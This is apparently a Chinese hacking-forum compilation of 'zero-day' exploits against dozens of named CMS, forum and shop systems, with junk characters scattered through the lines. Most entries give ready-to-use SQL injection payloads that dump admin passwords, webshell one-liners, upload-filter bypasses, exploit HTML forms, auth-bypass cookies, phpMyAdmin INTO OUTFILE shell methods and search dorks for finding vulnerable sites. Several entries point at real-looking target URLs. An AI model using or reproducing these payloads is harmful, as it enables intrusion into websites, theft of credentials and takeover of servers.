0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本

直接上exploit:
2 K8 u* M2 d6 V' R) [- ^$ djavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
7 a% Q6 e8 F5 k0 V% W3 Z1 Ptest:http://www.tb11.net/system/xitong/shownews.asp?id=210
7 N8 g1 ]$ O$ R* ]7 e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Asprain论坛 注册用户 上传图片就可拿到webshell

4 P& X5 Y* }9 M+ ~* ?Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
2.gif 为一小图片文件，一定要小，比如qq表情图片
( o- Q) F( W' |$ c9 T/ i  @- A/ M) S3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
5 x. |( x, W! U2 C4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5.q.asp;.gif
google：Powered by Asprain
2 ]" I. V6 ]9 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

5 Z& f1 P6 F/ `8 X  ^6 K* rShopNum1全部系统存在上传漏洞。

2 f8 Z4 n, ]5 i' J) T' M) u+ r首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
' y% B: u' C; N0 h" W* V' \6 w按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
; E5 o3 O# o- l1 C% w* y可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

牛牛CMS中小企业网站管理系统 上传漏洞
+ `5 m: _; [. O0 z- M
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
7 D. a7 r4 d5 j1 `% l3 b后台:admin/login.asp
ewebeditor 5.5 Nday
exp:
* z3 U; ^% t( }2 X/ H8 R' Y<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
1 T4 u* B0 I2 a) e- f<input?type=submit?value=upload>?
</form>
ps:先上传小马.
inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% e( O" m  h! p$ N* g
4 u' \0 E- d- K3 T/ GYothCMS 遍历目录漏洞

优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
4 e. b; @# x  c3 E+ k4 w默认后台:admin/login.asp
$ @; P: C0 Y( ~. t5 N2 S' l遍历目录:
ewebeditor/manage/upload.asp?id=1&dir=../
data:
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
# O1 {6 \+ S5 b* l1 A9 u4 T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

$ \4 ?4 o/ }9 C; k7 _2 z' ^' ANet112企业建站系统 1.0

源码简介：
& Y6 Q  @& R0 t6 mNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
* m+ N/ @% y5 G+ v" `添加管理员：
3 Q0 w( h3 \0 v0 R7 i1 Vhttp://www.0855.tv/admin/admin.asp?action=add&level=2
1 s" d& A7 b; T4 c" I$ A  B其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
http://www.0855.tv/inc/Upfile.asp?Stype=2
( O) _% u: A) n9 ]! r, [怎么利用自己研究。
遍历目录：
http://www.0855.tv/admin/upfile.asp?path=../..
如：
http://www.0855.tv/admin/upfile.asp?path=../admin
( b8 b7 ~' b) E7 J& Z$ ]& lhttp://www.0855.tv/admin/upfile.asp?path=../data
  m$ k/ d0 G% a9 K. ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

易和阳光购物商城通杀 上传漏洞
4 F/ W2 g5 E) G$ M6 B1 G1 E
$ t. F* P( m7 ?2 P前提要求是IIS6.0+asp坏境。
漏洞文件Iheeo_upfile.asp
过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
直接放到明小子上传
8 ^6 T  h) l" m! ~/ _( \Google搜索：inurl:product.asp?Iheeoid=
2 l% z5 X' q' B4 {) t3 M( x/ R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 H" a0 l: N, @, j. a
phpmyadmin后台4种拿shell方法
4 I+ ]4 u7 U" }5 G& y+ N0 i- Z
) R1 N' n* N! C# M$ m方法一：
5 v& N: [6 i& Y# p: C: _1 ]* \% r' ?/ NCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
7 ^7 _3 m+ L7 F( b4 P$ R! f4 |INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
一句话连接密码：xiaoma
方法二：
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
3 m  B2 C9 l9 J: [1 i4 b& _$ \9 ^select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
8 q# b* |0 c. F8 vDrop TABLE IF EXISTS xiaoma;
. `9 c6 V$ l' x; Z' R  n方法三：
! |! P: H9 W: {读取文件内容：    select load_file('E:/xamp/www/s.php');
3 m6 y; @( O* B5 Y写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* m9 Q; C/ x8 s0 c/ l& O3 ]方法四：
select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
6 I5 z" s5 x) P- m然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
) K+ h8 S" m; j5 t+ \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

传信网络独立开发网站源码0day漏洞

后台system/login.asp
, |! [7 u* m9 [进了后台有个ewebeditor
: H# t6 Z9 b5 V% \7 b; aGoogle 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
8 p1 l0 M+ }& D数据库ubbcode/db/ewebeditor.mdb
默认账号密码yzm 111111

8 ]+ ~9 p2 i. Y' G/ c拿webshell方法
登陆后台点击“样式管理”-选择新增样式
样式名称:scriptkiddies 随便写
3 v; t8 L  {5 p  y) |( g路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
3 ]) U! N$ t# }' ]+ j6 t3 V7 I图片类型比如就是我们要上传的ASP木马格式
上传路径：/
) N$ d- m7 G! K, H, o% u; Q图片限制：写上1000 免的上不了我们的asp木马
1 N7 n! N& X+ ?; T; ?上传内容不要写
2 m( U/ {6 M0 x) F5 c可以提交了
1 v! f3 k& ]6 H" _! {6 o9 [4 e样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
$ d6 \5 o" y$ T0 X按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
/ G3 B3 z8 g' f; U  d% j" N上ASP木马 回车 等到路径
4 Y6 Q8 \/ t4 I% X7 j' I$ i' h- V: w
6 w+ E( V: ]  A( }0 k2 f; u后台：system/login.asp
Exp:
! Z5 S4 G% v! [- cand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: o: L9 T# r/ w& O测试:
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
% ]$ R1 D( n, j6 S% ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4 B7 t6 Q$ U! |4 S% Efoosun 0day 最新注入漏洞
% h4 v  p" d4 [' w  i6 ]/ ?: v6 S' b
漏洞文件：www.xxx.com/user/SetNextOptions.asp
- X! d  b2 ^" F) @9 W! f利用简单的方法：
暴管理员帐号：
/ _% X. \; C6 _- U% \http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
4 z9 P+ R" U0 H) \- {8 j4 _暴管理员密码：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
; W0 n0 D3 @' {, Z8 _0 |5 j) w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

  ~1 a  u# Z' s- k3 {( t- l. T1 c网站程序的版权未知！

/ C. O( e% k8 u3 G& ?默认网站数据库：
) ~. e" }% f. B7 D2 }7 L% fwww.i0day.com/data/nxnews.mdb
ewebeditor 在线编辑器：
6 k4 D7 l6 N7 s" F  t. B编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
6 R# G7 o" `4 m  t+ O登录地址：ewebeditor/admin_login.asp
默认密码：admin  admin
9 [5 m" Z( {( ?+ E( p+ S6 d' g登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
8 h" ~1 o2 ]" s, d4 q( e$ F
$ O( x* H% E) Q2 A/ ISql注入漏洞：
% h6 S- _% ~0 U& P  j- A& rhttp://www.i0day.com/detail.asp?id=12
exp:
0 G6 ~0 V5 a% p: a& I* R, vunion select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞：
; r0 B3 V# M: c! Q* _4 `5 W! n- [后台+upfile.asp
如：
! v& Y5 ]# p" w9 l$ jhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
google:inurl:news.asp?lanmuName=
1 d8 g4 c! [+ o/ V+ g' U+ z  \7 g------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 |6 A) Z  P% h& w; {; O
dedecms最新0day利用不进后台直接拿WEBSHELL
5 ^' ^  b: h$ L% D
拿webshell的方法如下：
网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
: V' ~$ I" c& y8 n, [  C# K" L: q前题条件，必须准备好自己的dede数据库，然后插入数据：
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
' r4 c; Y/ l4 C6 [
7 Y1 L2 [' l) Q' t+ g8 o  n4 X再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
8 O2 P5 {( H) h, F' w1 D, `( Q<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
! p  C& o2 J3 Q: e) \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# K0 U  E, J4 ~* z' @<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
3 J" V& ~% `% x* j<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
& R1 y8 G! C- ^' u( s8 w' r<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ L9 X5 R# s3 i3 \<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
) H, r% {' k/ c5 C<input type="text" value="true" name="nocache" style="width:400">
, @2 i. L! Y4 v6 K' q<input type="submit" value="提交" name="QuickSearchBtn"><br />
/ X) P* G& j1 O- w</form>
<script>
function addaction()
/ R7 M+ P$ c6 o& q$ }* k{
6 c& a# e& H3 h) j7 Udocument.QuickSearch.action=document.QuickSearch.doaction.value;
}
% @1 h( i) [. ]  C/ M% X$ ~. w</script>
6 l/ a* H* z9 L' D-----------------------------------------------------------------------------------------------------------------------------------------------

9 `3 v) X! ^4 M. r9 `$ ndedecms织梦暴最新严重0day漏洞
" D' D9 I# {% h- N4 t, t. Ibug被利用步骤如下：
& \* A( y" e( ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 P1 |& d: r- R1 o2 |0 B4 n) |把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------

多多淘宝客程序上传漏洞
/ V: ?* N2 L& j漏洞页面：
; D5 Q+ P$ N; {) w, [admin\upload_pic.php
. @$ D9 y9 d% ~) D传送门：
3 e" O3 Y0 E$ p6 H  q4 r5 L8 l9 A) e0 Mhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
" |3 f8 H: J4 z. k% z7 t. MPS:copy张图片马 直接  xxx.php 上传抓包地址！
! w! M5 j* ]4 z; l3 [------------------------------------------------------------------------------------------------------------------------------------------------------
1 u' f9 A! J, M( z' n8 o$ G( z
无忧公司系统ASP专业版后台上传漏洞
漏洞文件 后台上传
admin/uploadPic.asp
' b1 I* S& E- ^! h) w) O! i漏洞利用 这个漏洞好像是雷池的
4 `4 ]& b% Z! |6 x! g9 n# V2 Lhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
5 y7 G! D3 r; g! F8 G9 ~. P/ O等到的webshell路径：
) k) [, x3 R* p' C: W  P8 V/UploadFiles/scriptkiddies.asp;_2.gif
1 U2 E. R6 W$ F  o6 b---------------------------------------------------------------------------------------------------------------------------------------------------
$ }' B* m& ~! N* o& X4 K5 @
住哪酒店分销联盟系统2010
  K' i; ^' f; P3 l9 R" ?* vSearch：
8 H  g) s7 v0 d8 ?% f* g  f0 Ninurl:index.php?m=hotelinfo
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
% _+ O$ {! z. z8 J默认后台：index.php?m=admin/login
5 s4 j2 P7 w1 w7 }--------------------------------------------------------------------------------------------------------------------------------------------------
  j! A0 Q* z- o$ E/ f* ?
inurl:info_Print.asp?ArticleID=
后台 ad_login.asp
爆管理员密码：
( q3 \& B# ~2 ]& V* N4 D' tunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------
* N1 ?2 B$ ]9 D7 J
0 m1 v3 ], m1 ^0 ], Y搜索框漏洞！
+ ^; p: F. E0 P%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------
: |4 p* l3 ~8 o. r1 d$ X9 ~
* x& r* I) Z$ R' h# M$ Q7 w关键字：
# ?' w3 K4 H- {" N, w  o4 D( Z+ Binurl:/reg_TemletSel.asp?step=2
或者
" n* l9 d' f6 W' `  u8 [电子商务自助建站--您理想的助手
9 B( U1 _5 L3 Z& ^1 k" E5 I-------------------------------------------------------------------------------------------------------------------------------------------------
2 P( g4 s+ D8 _( Y0 ^6 @
iGiveTest 2.1.0注入漏洞
Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
7 {3 F! z6 i1 }; t/ v------------------------------------------------------------------------------------------------------------------------------------------------

6 h7 {9 v. O& }1 W! X* NCKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

% z1 T, N+ s" y9 G+ G$ e; a段富超个人网站系统留言本写马漏洞
8 o/ H; ~/ S. Y$ d4 `& r1 z3 M源码下载：http://www.mycodes.net/24/2149.htm
1 f/ c1 j; l" yaddgbook.asp 提交一句话。
) B6 a# q, u& h5 B/ ~. p3 {连接： http://www.xxxx.tv/date/date3f.asp
1 J( d4 F# y2 }0 l: M7 Ngoogle:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 x5 w+ U! P6 W$ [8 c. ~
智有道专业旅游系统v1.0 注入及列目录漏洞
" L+ ]4 f9 [( S/ F默认后台路径：/admin/login.asp
默认管理员：admin
- H4 |9 k$ \( x6 E/ ^8 y) T7 q默认密码：123456
$ k- c* w$ W3 A. U  cSQL EXP Tset:
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
' J1 p4 F0 \9 d" m* w------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ewebeditor(PHP) Ver 3.8 本任意文件上传0day
EXP：
' h7 C& X9 A- T<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
art/form-data">
0 }% @( q2 r& a* x8 e- k<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
</form><br>
<script>
2 J# ^0 I* [3 Y8 u8 W. Zfunction fsubmit(){
form = document.forms[0];
* a. R, m3 J! Zform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
alert(form.action);
; R+ A8 F6 T5 X! Q$ aform.submit();
}
! R9 w: H% e9 M7 E</script>
注意修改里面ewebeditor的名称还有路径。
* Z8 P  `) r  g---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 e4 Z1 m3 [9 Q; J, I$ o! _6 d% m1 x
提交’时提示ip被记录 防注入系统的利用
0 A4 |5 {- A; v' H* `网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
: f6 v/ `8 A9 z5 [/ q& @$ B+ x5 V利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
$ N" v! C* ?1 @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 }, j$ d% m' L" Z- T
2 p1 ~% q6 @" S8 c0 z西部商务网站管理系统 批量拿shell-0day
- o2 y# t& C3 x, |2 `5 S. L这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
' T. f8 [/ @6 e! r4 i: U" `1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
5 Q# A1 x: \) a- b# e" c---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ a4 Q/ H" k) V' H
. S' O& ~9 ~- p9 x. S- y# J8 mJspRun!6.0 论坛管理后台注入漏洞

4 a1 f  D2 [8 d& H' \5 j, ]SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
JspRun!6.0
漏洞描述:
& i, }* ]# k4 y7 }JspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
String export = request.getParameter("export");//直接获取，没有安全过滤
if(export!=null){
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
& h; L% }0 }9 Q7 n& y" w2 ~<*参考
nuanfan@gmail.com
*> SEBUG安全建议:
( b7 L  L; n" [2 _. Y' h! Qwww.jsprun.net
（1）安全过滤变量export
4 ^: n( A' a! x0 R: E（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- p2 `! S. Q% {
乌邦图企业网站系统 cookies 注入

程序完整登陆后台:/admin/login.asp
默认登陆帐号:admin 密码:admin888
语句：(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
5 k+ w' Y' |* E5 C7 u或者是16个字段：
! x' o2 I, K" Iand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
注入点：http://www.untnt.com/shownews.asp?=88
getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
关键字：
& i/ K3 C8 n1 x* z3 D% y) cinurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CKXP网上书店注入漏洞

工具加表:shop_admin 加字段:admin
) `0 r1 v  m$ l' ?) _. J后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
! N# `2 D' S$ Pinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; i) r7 ?- L2 P( l9 {6 }---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YxShop易想购物商城4.7.1版本任意文件上传漏洞
( o- R8 ]' y! B; d$ U* E
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
跳转到网站根目录上传任意文件。
# V' ~5 I! W1 U2 \: [6 p/ h7 z如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
# E% m/ G. P0 g$ E0 }; Y; Q  Y<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
% h4 O1 z. I6 P5 h) Z& S4 d</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

  Q1 _; r& E$ LSDcms 后台拿webshell

第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
2 H8 e6 c  F5 J0 j; y第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
7 X) c) @  @1 z0 N& e7 i  A第三种方法：
$ S* I; N) [$ {/ o: ^4 K( b& l进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
# @! ?9 V3 q/ h' X' `9 @6 K内容写入下面内容：
/====================复制下面的=========================/
; w) C/ y* A  P: s5 n! i<%@ WebHandler Language="C#" Class="Handler" %>
3 [. e; R+ b7 N) Cusing System;
; m$ F1 n2 f; Q- r8 jusing System.Web;
) n' A3 [# H7 o6 Y7 q5 |7 xusing System.IO;
: l) N, x6 ^5 Q' l" N! wpublic class Handler : IHttpHandler {
% c, O8 e4 Y6 S1 w' p- spublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
  B* z1 `3 J* F: p' A# Q* |StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
8 {+ \9 I! T; k' u$ P* Rfile1.Close();
' E  Y: U4 \4 r}
6 w% s5 @$ l5 L  h1 H6 H' spublic bool IsReusable {
5 ~# j; r5 Z3 uget {
# C3 \: X& Z) m8 r% R" b2 v+ freturn false;
' W- j0 F  ~+ z' u1 A/ S9 W, k}
}
& H$ N4 t1 j& {0 c- r% ?}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( L9 N1 I+ c' F0 O: O5 a- C- \
8 Y& s( V; c* s0 y. n. xESCMS网站管理系统0day
( H% x( M5 O! I
8 P. t8 _( f7 p后台登陆验证是通过admin/check.asp实现的
# e; [6 n, q  u% x, m! T
首先我们打开http://target.com/admin/es_index.html
然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;
& X& S$ ^# Q' L修改,然后刷新
进后台了嘎..
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
% A4 K* d- B2 r/ x  b9 i
. C" L5 l2 l& K4 G  C' L# k: [利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
9 `; S9 ?* Y1 O6 u% M7 N& }' L7 ^" z嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

宁志网站管理系统后台无验证漏洞及修复
1 c& B# B7 J+ T$ N( _6 |; m. a3 {- Z
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
# s( |7 `6 w& }: ]# a! e官方网站:www.ningzhi.net
学校网站管理系统 V.2011版本
- ?* ]0 \# P" h6 D% V3 ahttp://down.chinaz.com/soft/29943.htm
6 b( @+ N5 l3 v, n其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
login.asp代码如下:
<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
manage.asp代码我就不帖出来了.反正也没验证.
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
3 {( x' V* r) \/ s( g, X& ^' \漏洞利用:
* x- |+ p% M, {9 L# x$ I# y直接访问http://www.0855.tv/admin/manage.asp
2 c" E: y* g( n2 S, |0 ?数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
4 u1 }7 O+ S! g- N0 J, W( Y) Q----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 F3 B# a! B  f- f& U' |
phpmyadmin拿shell的四种方法总结及修复
9 @, y9 l- ]9 E; G  t
方法一：
. U$ y1 U- y$ C' r* H# j# @CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
+ F; v8 @- e2 [( U0 Z3 m+ U$ Q8 D( W  }INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
3 [. p% ?: E: Z( y. q. t6 i4 kSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
5 k$ b/ J4 P: d, A7 w6 t/ N----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
* w7 }, R" z8 [- Z方法二：
读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三：
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
) N- p# F4 S  N6 M7 C& GDrop TABLE IF EXISTS study;
<?php eval($_POST[cmd])?>
' Q3 s/ Y7 p( \4 m; ~1 xCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
: T4 B; A$ q! N6 NSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
* s" s" Z( C0 ~- ?/ LDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四：
select load_file('E:/xamp/www/study.php');
